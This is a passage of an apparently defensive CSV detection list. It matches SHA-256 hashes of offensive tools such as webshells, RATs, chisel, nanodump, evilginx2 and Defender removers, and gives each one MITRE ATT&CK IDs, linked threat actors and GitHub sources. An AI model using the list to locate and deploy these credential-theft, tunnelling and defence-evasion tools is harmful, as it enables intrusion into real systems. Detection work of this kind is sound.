vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#GUIDproject","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","26006" "*49bf39a5611a385ee3e498cb43bcbb7ece41b689edafc556f35826f538580d46*",".{0,1000}49bf39a5611a385ee3e498cb43bcbb7ece41b689edafc556f35826f538580d46.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26008" "*49c0747721f7e7e5d776d23d83f705951595de8e63df7b7afb43824f4a3415f3*",".{0,1000}49c0747721f7e7e5d776d23d83f705951595de8e63df7b7afb43824f4a3415f3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - 
T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26009" "*49c1d5aafeb8e45567b93e3bdf9b229b467eca67d53f0c05a812a5089f6c46ab*",".{0,1000}49c1d5aafeb8e45567b93e3bdf9b229b467eca67d53f0c05a812a5089f6c46ab.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26010" "*49c790c9a66b4c86711bbde3e558b4c026d68c251baa46ff14afd4c8e9c80bb8*",".{0,1000}49c790c9a66b4c86711bbde3e558b4c026d68c251baa46ff14afd4c8e9c80bb8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26011" "*49c9788a669f864351f347d5f13e34cab961a6bc88afe5f8a5e32e868a2fc81d*",".{0,1000}49c9788a669f864351f347d5f13e34cab961a6bc88afe5f8a5e32e868a2fc81d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26012" "*49cf02eb8f76329b62378b8e9b0ae5abbe0312b9f2c3e068dbdf57f9474dfd8c*",".{0,1000}49cf02eb8f76329b62378b8e9b0ae5abbe0312b9f2c3e068dbdf57f9474dfd8c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26013" "*49cf75f28e0c89a8fac346f1c794ff1bcc985c85f47f17e1ce77de5216eab525*",".{0,1000}49cf75f28e0c89a8fac346f1c794ff1bcc985c85f47f17e1ce77de5216eab525.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26014" "*49df12075c49bb956291cd11b2c53626174b4128309ada438d5d5e49265866f9*",".{0,1000}49df12075c49bb956291cd11b2c53626174b4128309ada438d5d5e49265866f9.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","#filehash","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","26015" "*49f487316920c28f546082c345a58fad4bd470507ddc74f34a2515110f193b7d*",".{0,1000}49f487316920c28f546082c345a58fad4bd470507ddc74f34a2515110f193b7d.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","26017" "*4a0a4a3bf506b1e511eb78eddd1fef6c7d29a76668fda6286914b13c78cbdb19*",".{0,1000}4a0a4a3bf506b1e511eb78eddd1fef6c7d29a76668fda6286914b13c78cbdb19.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26020" "*4a190816cd6f296571f8f457a82b950e510473884e1ebf0de0fa51ac6d8ba250*",".{0,1000}4a190816cd6f296571f8f457a82b950e510473884e1ebf0de0fa51ac6d8ba250.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26024" "*4a1e4478704d8ad1fbec9b3258f315028fedd0dfbf739508ab1438d42625cbef*",".{0,1000}4a1e4478704d8ad1fbec9b3258f315028fedd0dfbf739508ab1438d42625cbef.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26026" "*4a25a09ed816e1c629945dbd33779ab714d82bebf661557864aa61562ed4298c*",".{0,1000}4a25a09ed816e1c629945dbd33779ab714d82bebf661557864aa61562ed4298c.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","26027" "*4a284165c3aab4ccc0a6e97353d7bac85b1fcd7160d020eca7b18cd1608ba1a4*",".{0,1000}4a284165c3aab4ccc0a6e97353d7bac85b1fcd7160d020eca7b18cd1608ba1a4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26028" "*4a2cb5591a0c84383b2a476d27de2647ae1a88c1e60ba409a90049a132bebb73*",".{0,1000}4a2cb5591a0c84383b2a476d27de2647ae1a88c1e60ba409a90049a132bebb73.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","26029" "*4a3192bb30ab0b91e3909e2b64b22ea7a262199c5edf5d2f54946dc5212bc7c5*",".{0,1000}4a3192bb30ab0b91e3909e2b64b22ea7a262199c5edf5d2f54946dc5212bc7c5.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - 
TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26032" "*4a32296896ca13b64f5bc86c8213c0755510c352c44663054947f9ed2c5c0983*",".{0,1000}4a32296896ca13b64f5bc86c8213c0755510c352c44663054947f9ed2c5c0983.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26033" "*4a4a016032aef2083d5ff676240cdff59697197314a4c66abcf696aa23126de7*",".{0,1000}4a4a016032aef2083d5ff676240cdff59697197314a4c66abcf696aa23126de7.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","26036" 
"*4a4b9536d0dbd27943d838e78f76a05c360856cb4d99a22d27b4d08f20887482*",".{0,1000}4a4b9536d0dbd27943d838e78f76a05c360856cb4d99a22d27b4d08f20887482.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26037" "*4a4dbfa07c6f4a72b6727c4a2ed8ef2899f61f724a9b5d142ab30b1c283a6db8*",".{0,1000}4a4dbfa07c6f4a72b6727c4a2ed8ef2899f61f724a9b5d142ab30b1c283a6db8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26038" "*4a51b007c344a876a579fd81cbd8b10835afde379f145f823794d763707c63c9*",".{0,1000}4a51b007c344a876a579fd81cbd8b10835afde379f145f823794d763707c63c9.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26040" "*4a559425f55fd91596a8ad4c4caba2c2078900678b61b5097aca0b4b12cac605*",".{0,1000}4a559425f55fd91596a8ad4c4caba2c2078900678b61b5097aca0b4b12cac605.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26041" "*4A5A36539C52FB818E21404B336FC1936B4B5A6AFBB432CD9DB9672F2BAC1B73*",".{0,1000}4A5A36539C52FB818E21404B336FC1936B4B5A6AFBB432CD9DB9672F2BAC1B73.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","26043" "*4a613d768611d513d39de2212129c8fe56b77c016b0818584a3ca3cfd6a9bcaf*",".{0,1000}4a613d768611d513d39de2212129c8fe56b77c016b0818584a3ca3cfd6a9bcaf.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","26044" "*4a642afafcbd3d6f5b704b50ea54ef59b5dea78f679cd7f1513b8d81b8d93cbb*",".{0,1000}4a642afafcbd3d6f5b704b50ea54ef59b5dea78f679cd7f1513b8d81b8d93cbb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26046" "*4a7242511d6678dc255d9f4651ea4ed2fec74f5293323c2ce6bb23956beb02a4*",".{0,1000}4a7242511d6678dc255d9f4651ea4ed2fec74f5293323c2ce6bb23956beb02a4.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","26047" "*4a738ce94499ea3c39ff65328e513db7df9db009d6df5422331f30a09b688e31*",".{0,1000}4a738ce94499ea3c39ff65328e513db7df9db009d6df5422331f30a09b688e31.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26048" "*4a84c293927779fba03f1947803557c22ba6ad4b10dcc9780827df5cdeafa2ed*",".{0,1000}4a84c293927779fba03f1947803557c22ba6ad4b10dcc9780827df5cdeafa2ed.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26049" "*4a852249475372d387ac1ba1c5ccd8b541dac4d89fb4ec51877cad81024a0c08*",".{0,1000}4a852249475372d387ac1ba1c5ccd8b541dac4d89fb4ec51877cad81024a0c08.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26050" "*4a8cf21bf284a3a1b2e17abf51ac94f47ba5595676a56d4fe9b276054528e4e8*",".{0,1000}4a8cf21bf284a3a1b2e17abf51ac94f47ba5595676a56d4fe9b276054528e4e8.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26051" "*4a8e184ca9e1ccc775b224a48d344ce13dde26a86a634df2853ce7a27c17765c*",".{0,1000}4a8e184ca9e1ccc775b224a48d344ce13dde26a86a634df2853ce7a27c17765c.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. 
The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","#filehash","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","26052" "*4a9652d48155a187a4c87e8d243f3b2514879927e9b8d56bd17e9b1c0d50da4b*",".{0,1000}4a9652d48155a187a4c87e8d243f3b2514879927e9b8d56bd17e9b1c0d50da4b.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","26053" "*4a96ba27c260b02607556b05e93f631af307a6046a79936e8e229ecd84f12b7f*",".{0,1000}4a96ba27c260b02607556b05e93f631af307a6046a79936e8e229ecd84f12b7f.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","26054" "*4a9d528dc102560378cff97262caeae12e24e64b94e381e6e5709e3b2bb89291*",".{0,1000}4a9d528dc102560378cff97262caeae12e24e64b94e381e6e5709e3b2bb89291.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","26056" "*4a9dc2a031cf05b8ba61fde0462db7942194297b4e763e9d85c57d99746a242f*",".{0,1000}4a9dc2a031cf05b8ba61fde0462db7942194297b4e763e9d85c57d99746a242f.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - 
T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26057" "*4aa1f8595b2334131d7349d8e60ed3d0bfe9c72abd053d42b6e74111b4e010eb*",".{0,1000}4aa1f8595b2334131d7349d8e60ed3d0bfe9c72abd053d42b6e74111b4e010eb.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","26058" "*4aa27ae37edfbfe57f3ab989d192caf21b3c871516958eb77205c9ad700c3f67*",".{0,1000}4aa27ae37edfbfe57f3ab989d192caf21b3c871516958eb77205c9ad700c3f67.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","26059" "*4aa7737009a9f06b9f4957c4fc12932ae0cd2039471d2ae4e5d4666ffeb40a2e*",".{0,1000}4aa7737009a9f06b9f4957c4fc12932ae0cd2039471d2ae4e5d4666ffeb40a2e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26062" "*4aa99dcaf5030b1c4c7c57edd0fea22ab6db79caff79a547cc07572077631646*",".{0,1000}4aa99dcaf5030b1c4c7c57edd0fea22ab6db79caff79a547cc07572077631646.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - 
T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","#filehash","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","26063" "*4aaaf489536ec7521629fda215dc34a1f69836a77d29d44d2dbdd6da4bc2c250*",".{0,1000}4aaaf489536ec7521629fda215dc34a1f69836a77d29d44d2dbdd6da4bc2c250.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","26064" "*4aac42059bf3bbd0742633ba002b4f20de0881ee15397b79cb7aec0244904065*",".{0,1000}4aac42059bf3bbd0742633ba002b4f20de0881ee15397b79cb7aec0244904065.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26065" "*4ab0e8086598b7691fd17afbfa4a1cd79b3a13a9001a791c15a9f30afd43d13e*",".{0,1000}4ab0e8086598b7691fd17afbfa4a1cd79b3a13a9001a791c15a9f30afd43d13e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26066" "*4ab4e04a014333fd820edebcd24b0fa920390d312f951bcf3cc1a7733baecdb8*",".{0,1000}4ab4e04a014333fd820edebcd24b0fa920390d312f951bcf3cc1a7733baecdb8.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","26067" "*4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb*",".{0,1000}4ab6038d1b1fa84df1d657c3e46d6d884cd3f646a8a3c35c96ea4885c0b48dbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26068" "*4abe9875f67c1fe6a007397189962a3d3b99a6251c601128936dfbd6709c193d*",".{0,1000}4abe9875f67c1fe6a007397189962a3d3b99a6251c601128936dfbd6709c193d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26083" "*4acaf168b97204a65d3bb68658755a143837689a38bfa0d7705eee432e4cdcc4*",".{0,1000}4acaf168b97204a65d3bb68658755a143837689a38bfa0d7705eee432e4cdcc4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26086" "*4ad3b9a888e8b5338f81b44637feb93f929d8314992fc9b9b6566def8a6c59f9*",".{0,1000}4ad3b9a888e8b5338f81b44637feb93f929d8314992fc9b9b6566def8a6c59f9.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","26091" "*4ad964e61bd5f63da0f48dfdbf4252550a4a8f894bf3c0813b3eb0dab6ac73bf*",".{0,1000}4ad964e61bd5f63da0f48dfdbf4252550a4a8f894bf3c0813b3eb0dab6ac73bf.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26093" "*4adc5ba3d41fb6fd485c85df8bc00fc578280294e5724f34b6d1fbb79d9d1e80*",".{0,1000}4adc5ba3d41fb6fd485c85df8bc00fc578280294e5724f34b6d1fbb79d9d1e80.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
